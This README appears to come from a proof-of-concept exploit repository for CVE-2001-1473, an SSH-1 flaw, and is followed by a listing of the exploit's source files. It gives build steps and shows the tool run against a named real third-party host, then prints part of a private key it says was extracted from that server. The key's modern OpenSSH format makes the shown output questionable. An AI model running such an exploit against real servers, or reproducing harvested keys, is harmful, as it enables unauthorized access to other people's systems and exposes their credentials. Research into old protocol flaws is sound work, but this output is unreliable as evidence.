poc-CVE-2001-1473
# How to exploit CVE-2001-1473
We employed a novel approach to an age-old vulnerability in the [SSH-1](https://packetstormsecurity.com/files/22442/ssh-1.2.30.tar.gz.html) protocol, as described by [CVE-2001-1473](https://nvd.nist.gov/vuln/detail/CVE-2001-1473). This vulnerability enables a Man-in-the-Middle (MITM) server to intercept an SSH-1 session between a client and a vulnerable server, potentially exposing the user's private key. However, executing a practical attack necessitates the client's usage of the attacking server as a hopping node and granting permission for unknown server keys, significantly increasing the complexity of a successful exploit.
Our adaptation of the original attack method enables the extraction of the SSH server's private key itself, offering access to the vulnerable server with sshd permissions. Notably, this modified approach eliminates the MITM requirement and can be executed directly against the vulnerable server.
For technical details, read [our paper](method.md).
# Install
```bash
./configure
make
make install
```
The code is installed in `/usr/local/bin`.
# Example
One of the vulnerable hosts detected in nuclei scan:
```
[CVE-2001-1473] [tcp] [high] nmr.ioc.ac.ru:22
```
Launching an attack:
```text
dcow -s nmr.ioc.ac.ru
pk retrieved:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA18RGKpk+UHIKVDnRcaoHI97YDp1mAu+9gMcako/uFZkRFG1p/XHz
CL+/EZ9cGc0KT6fRzAGHxxfeJ4j4gsAFzBFaMWx2jfEinduSQGdxi4JtdqCY2Y8+YrIORg
mpOtwi+Pxue1R4JndIhH+AXVUptODrU1clBtZePcLd5aG4JVzyX0c2+BA0ekadyhAySvqS
bTCTQNVt0eB0JUmHjYh3FIk9AjnAnDe6F7iPeq0dPwfSAY13QS3WGX38tMWjDHntrWACEf
9zE9QCDDquwM3hs3cah9c+jzvDK2AKD3EOwXHF8Df4CHZ2L4x3AXqxbRgZZE3+nTa0Dt4h
ITAsyKp7a0DVzCwtK0DB1LfUPkWnxeIMcZQkTdcjypr9/9VqgacHvZjmKOf3utBglHfnWk
...
```
# Disclaimer
This Proof of Concept (PoC) is intended solely for white-hat purposes and educational use. It has been created to demonstrate potential security vulnerabilities in a controlled, ethical, and lawful environment. It is not designed for malicious activity, exploitation of real systems, or any illegal purposes.
Any unauthorized or illegal use of this PoC is strictly prohibited and may result in legal consequences. The author is not responsible for any misuse of this code or any damage caused by its improper use.
Use this PoC responsibly, within the bounds of ethical hacking guidelines and in accordance with applicable laws.
[4.0K] /data/pocs/6cc2a16861a3b1464171019d9d83460c2e96c488
├── [1.2M] configure
├── [ 947] CONTRIBUTING.md
├── [9.9K] dcow.cpp
├── [4.0K] golang
│ ├── [ 197] makefile
│ ├── [ 356] README.md
│ └── [4.0K] src
│ ├── [4.0K] expl
│ │ └── [8.1K] expl.go
│ └── [4.0K] main
│ └── [2.5K] main.go
├── [4.0K] legacy
│ ├── [ 10K] dcow.cpp
│ ├── [ 132] makefile
│ └── [ 150] README.md
├── [7.9K] method.md
├── [2.4K] README.md
└── [ 7] version
5 directories, 13 files